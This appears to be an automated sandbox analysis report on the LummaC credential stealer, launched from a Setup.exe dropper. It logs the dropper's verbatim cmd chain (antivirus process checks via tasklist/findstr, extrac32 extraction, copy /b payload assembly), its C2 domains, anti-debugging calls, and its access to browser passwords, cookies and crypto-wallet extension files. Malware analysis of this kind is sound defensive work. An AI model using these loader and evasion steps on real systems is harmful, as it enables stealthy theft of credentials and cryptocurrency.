Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Preceding.com, 0000000D.00000002.4650275127.0000000004A43000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWV
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Preceding.com, 0000000D.00000003.2674954087.0000000004B19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002FF4FF BlockInput,

13_2_002FF4FF

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_0028338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

13_2_0028338B

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002A5058 mov eax, dword ptr fs:[00000030h]

13_2_002A5058

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002E20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

13_2_002E20AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002B2992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_002B2992
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002A0BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	13_2_002A0BAF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002A0D45 SetUnhandledExceptionFilter,	13_2_002A0D45
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	Code function: 13_2_002A0F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_002A0F91

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Preceding.com, 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: truculengisau.biz
Source: Preceding.com, 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: spookycappy.biz
Source: Preceding.com, 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: punishzement.biz
Source: Preceding.com, 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: nuttyshopr.biz
Source: Preceding.com, 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: marketlumpe.biz
Source: Preceding.com, 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: littlenotii.biz
Source: Preceding.com, 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: grandiouseziu.biz
Source: Preceding.com, 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: fraggielek.biz
Source: Preceding.com, 0000000D.00000002.4648892685.00000000007D1000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: enthuasticsa.cyou

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

13_2_002E1B4D

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_0028338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

13_2_0028338B

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002EBBED SendInput,keybd_event,

13_2_002EBBED

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002EEC6C mouse_event,

13_2_002EEC6C

Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Shoppercom Shoppercom.cmd & Shoppercom.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 598591	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Advertise	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Findarticles" Stockings	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 598591\Preceding.com + Expiration + Rights + Addiction + Intensity + Surfing + Jam + Dramatically + Human + Enlarge 598591\Preceding.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Cd + ..\Invite + ..\Reproduce + ..\Greensboro + ..\Nervous + ..\Few + ..\Since o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com Preceding.com o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002E14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

13_2_002E14AE

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002E1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

13_2_002E1FB0

Source: Preceding.com, 0000000D.00000000.2239146216.0000000000343000.00000002.00000001.01000000.00000007.sdmp, Preceding.com, 0000000D.00000003.2637301145.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp, Preceding.com.2.dr, Human.9.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Preceding.com	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002A0A08 cpuid

13_2_002A0A08

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002DE5F4 GetLocalTime,

13_2_002DE5F4

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002DE652 GetUserNameW,

13_2_002DE652

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Code function: 13_2_002BBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

13_2_002BBCD2

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: Preceding.com PID: 3792, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Preceding.com, 0000000D.00000002.4649695009.00000000017C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: Preceding.com, 0000000D.00000002.4649695009.00000000017C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: Preceding.com, 0000000D.00000002.4649695009.00000000017C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: Preceding.com, 0000000D.00000002.4650275127.0000000004A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: Preceding.com, 0000000D.00000002.4649695009.00000000017C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Preceding.com, 0000000D.00000002.4649695009.00000000017C3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: Preceding.com, 0000000D.00000002.4650275127.0000000004A43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: Preceding.com, 0000000D.00000002.4649778438.000000000183C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\598591\Preceding.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
